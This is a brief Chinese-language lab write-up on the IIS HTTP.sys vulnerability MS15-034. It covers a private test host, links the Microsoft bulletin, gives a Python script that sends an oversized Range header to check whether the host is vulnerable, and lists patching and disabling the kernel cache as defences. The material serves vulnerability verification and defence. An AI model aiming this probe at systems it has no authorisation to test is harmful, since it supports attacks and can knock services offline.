一、 测试环境
ip: 192.168.80.200
操作系统:win2012
中间件:IIS8.5
二、 漏洞背景
漏洞详细参考如下信息:
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
三、 验证
import requests
Url = "http://192.168.80.200"
http_headers={
"Host":"irrelevant",
"Range":"bytes=0-18446744073709551615"
}
respone = requests.get(url = Url,headers = http_headers)
if str(respone.content).find("Requested Range Not Satisfiable") >= 0:
print("url: "+Url+" 存在MS15-034漏洞!")
else:
print("url: "+Url+" 未发现漏洞")
四、 防御措施
1.打补丁
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
2.临时禁用IIS内核缓存